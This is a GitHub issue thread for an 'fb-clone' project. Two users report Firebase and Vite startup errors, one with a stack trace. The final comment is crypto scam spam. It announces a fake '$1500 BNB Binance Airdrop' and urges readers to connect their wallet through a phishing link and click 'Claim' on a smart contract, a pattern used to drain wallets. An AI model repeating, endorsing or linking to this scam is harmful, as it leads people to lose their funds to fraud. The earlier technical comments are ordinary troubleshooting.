### ISSUE TITLE
I don't manage to make this to start I get error after error and I'm now stocked in this error

### ISSUE THREAD

**Issue by sebababi** [ayushiee/fb-clone#2]
I don't manage to make this to start I get error after error and I'm now stocked in this error

I cannot even find that prebuilt.js so I suppose it's generated.
The source should be: http://localhost:3000/node_modules/@firebase/firestore/dist/prebuilt.js

I've been trying to re-install all the dependencies, even with the same version.

To solve the above issue I tried to reinstall firebase:

$ npm init
$ npm install --save firebase

OR 

$ npm install --save firebase@8.6.8

$ npm install 

I've deleted node_modules and package.json and reinstalled npm

$ npm install

And no success:

Here's the latest error I don't manage to over pass:

Uncaught TypeError: Cannot convert undefined or null to object
    at hasOwnProperty (<anonymous>)
    at prebuilt.js:14643:50
    at e.t2 (prebuilt.js:14644:37)
    at new e (prebuilt.js:15235:9)
    at index.ts:41:9
    at Component2.instanceFactory (config.ts:80:16)
    at Provider2.getOrInitializeService (provider.ts:315:33)
    at Provider2.getImmediate (provider.ts:113:21)
    at FirebaseAppImpl2._getService (firebaseApp.ts:136:22)
    at firebaseAppImpl.<computed> [as firestore] (firebaseNamespaceCore.ts:228:29)

Any help would be appreciated.

**Comment by pipechaves** [comment]
Same as you, got

[plugin:vite:import-analysis] Failed to resolve import "../config.json" from "src\utils\firebase.ts". Does the file exist?

![image](https://github.com/ayushiee/fb-clone/assets/22892247/f7ec6c05-6087-4c48-abcd-cf1a650ad7e4)

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
